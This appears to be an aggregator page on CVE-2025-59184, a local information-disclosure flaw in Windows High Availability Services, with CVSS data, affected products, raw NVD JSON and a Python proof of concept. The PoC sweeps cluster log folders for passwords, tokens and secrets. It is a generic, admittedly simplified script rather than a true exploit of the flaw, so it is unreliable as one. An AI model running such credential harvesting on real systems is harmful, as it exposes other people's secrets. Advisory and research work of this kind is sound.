Security Vulnerability Report
中文
CVE-2025-59184 CVSS 5.5 MEDIUM

CVE-2025-59184

Published: 2025-10-14 17:15:57
Last Modified: 2025-11-07 17:52:16
Source: [email protected]

Description

Exposure of sensitive information to an unauthorized actor in Windows High Availability Services allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:* - VULNERABLE
Windows Server 2025 (受影响)
Windows Server 2022 (受影响)
Windows Server 2019 (受影响)
Windows Server 2016 (受影响)
Windows 11 Version 24H2 (受影响)
Windows 11 Version 23H2 (受影响)
Windows 10 Version 22H2 (受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59184 - Windows High Availability Services Information Disclosure PoC # This PoC demonstrates local information disclosure from WSFC service resources # Requires: Local authenticated access with low privileges import os import sys import ctypes import struct def check_wsfc_service(): """Check if Windows High Availability Services are running""" try: import subprocess result = subprocess.run( ['sc', 'query', 'ClusSvc'], capture_output=True, text=True ) return 'RUNNING' in result.stdout except Exception as e: print(f"[-] Error checking service: {e}") return False def enumerate_wsfc_artifacts(): """Enumerate WSFC-related artifacts accessible to low-privilege users""" artifacts = [] # Common WSFC log locations log_paths = [ r"C:\Windows\Cluster\Reports", r"C:\Windows\Cluster\Logs", ] # Check shared memory segments (simplified) # In a real exploit, this would use NtOpenSection / MapViewOfFile print("[*] Scanning for WSFC service artifacts...") for path in log_paths: if os.path.exists(path): artifacts.append(path) print(f"[+] Found accessible path: {path}") return artifacts def read_sensitive_info(artifact_path): """Attempt to read sensitive information from discovered artifacts""" try: # Attempt to read cluster log files for sensitive data if os.path.isdir(artifact_path): for root, dirs, files in os.walk(artifact_path): for file in files: filepath = os.path.join(root, file) try: with open(filepath, 'r', errors='ignore') as f: content = f.read() # Look for sensitive patterns if any(keyword in content.lower() for keyword in ['password', 'credential', 'token', 'key', 'secret']): print(f"[!] Sensitive data found in: {filepath}") return content[:500] # Return first 500 chars except PermissionError: pass except Exception as e: print(f"[-] Error reading artifact: {e}") return None def main(): print("=" * 60) print("CVE-2025-59184 - WSFC Information Disclosure PoC") print("=" * 60) if not check_wsfc_service(): print("[-] WSFC service is not running. Exiting.") sys.exit(1) print("[+] WSFC service is running") artifacts = enumerate_wsfc_artifacts() if artifacts: for artifact in artifacts: sensitive_data = read_sensitive_info(artifact) if sensitive_data: print(f"\n[!] Extracted sensitive information:\n{sensitive_data}") else: print("[-] No accessible artifacts found") print("\n[*] PoC execution completed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59184", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:56.653", "lastModified": "2025-11-07T17:52:15.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive information to an unauthorized actor in Windows High Availability Services allows an authorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.14393.8519", "matchCriteriaId": "860ADFF9-62D0-425B-9310-99ACFC92EB12"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.1913", "matchCriteriaId": "370C12D6-90EF-44BE-8070-AA0080C12600"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.26100.6899", "matchCriteriaId": "CD6268EB-C42B-406F-B3FF-6E694F93BF41"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59184", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.